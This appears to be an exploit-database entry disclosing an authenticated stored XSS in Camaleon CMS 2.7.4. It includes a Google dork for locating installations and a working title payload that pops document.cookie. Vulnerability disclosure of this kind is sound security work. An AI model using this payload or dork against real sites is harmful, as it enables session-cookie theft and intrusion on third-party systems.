Cameleon cms 2.7.4 persistent stored xss in post title Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-05-23 |
Type : webapps |
Platform : ruby
This exploit / vulnerability Cameleon cms 2.7.4 persistent stored xss in post title is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4
# Google Dork: intext:"Camaleon CMS is a free and open-source tool and
a fexible content management system (CMS) based on Ruby on Rails"
# Date: 2023-10-05
# Exploit Author: Yasin Gergin
# Vendor Homepage: http://camaleon.tuzitio.com
# Software Link: https://github.com/owen2345/camaleon-cms
# Version: 2.7.4
# Tested on: Linux kali 6.1.0-kali7-amd64
# CVE : -
--- Description ---
http://127.0.0.1:3000/admin/login - Login as a Admin
Under Post tab click on "Create New"
While creating the post set Title as "><svg/onmouseover=alert(document.cookie)>
http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent
to this url